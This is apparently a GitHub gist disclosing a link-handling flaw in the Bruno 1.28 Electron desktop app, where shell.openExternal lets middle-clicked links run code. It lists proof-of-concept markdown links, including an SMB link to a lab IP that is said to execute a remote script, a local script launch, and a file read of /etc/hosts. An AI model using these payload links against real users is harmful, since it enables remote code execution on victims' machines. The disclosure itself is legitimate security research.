Skip to content

Instantly share code, notes, and snippets.

@opcod3r
Created September 22, 2024 22:14
Show Gist options
  • Save opcod3r/ab69f36d52367df7ffac32a597dff31c to your computer and use it in GitHub Desktop.
Save opcod3r/ab69f36d52367df7ffac32a597dff31c to your computer and use it in GitHub Desktop.
Bruno 1.28 Exploit Code shell.openExternal Electron NodeJS

Reported by: Rodolfo Tavares ~ opcod3r

Bruno Desktop Electron app opens new windows using shell.openExternal(). This allows an attacker to gain remote code execution on a user's computer if they middleclick a malicious link. This vulnerability allows an attacker to execute code on the victims machine. The victim has to interact with the link though and sees the URL that is opened. fixed https:/github.com/usebruno/bruno/pull/3122/files

POC Linux: https://youtu.be/SPCGVLEfVgw

POC Windows: https://youtu.be/KVwKQkXA-vI

POC MacOS: https://youtu.be/S0W93tbKaFY

  - ` [calc](/System/Applications/Calculator.app)` – Opens Calculator on macOS.
  - `[calcFile](System/Applications/Calculator.app)` – Another method to trigger Calculator on macOS.
  - `[exploit1](smb://10.211.55.6/public/hello.scptd)` – Connects to a remote SMB share and executes a script.
  - `[exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt)` – Executes a script from a mounted volume on macOS.
  - `[file](///etc/hosts)` – Reads the system’s `/etc/hosts` file on macOS/Linux.
  - On Windows, the same type of attack can be executed with the link: `calc.exe` to launch the calculator or potentially other malicious payloads.

- **Protocol exploitation:**
  - `[facetime1](facetime:+123456789)` – Attempts to launch FaceTime with a specific phone number.
  - `[facetime2](facetime:someone@example.com)` – Triggers FaceTime using an email address.
  - `[tel](tel:+123456789)` – Initiates a phone call via the `tel:` protocol.
  - `[mail](x-apple-reminder://)` – Opens the Apple Reminders app via a custom protocol.
  - `[calendar](calendar://)` – Attempts to open a calendar application.

More info, you can watch the videos :)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment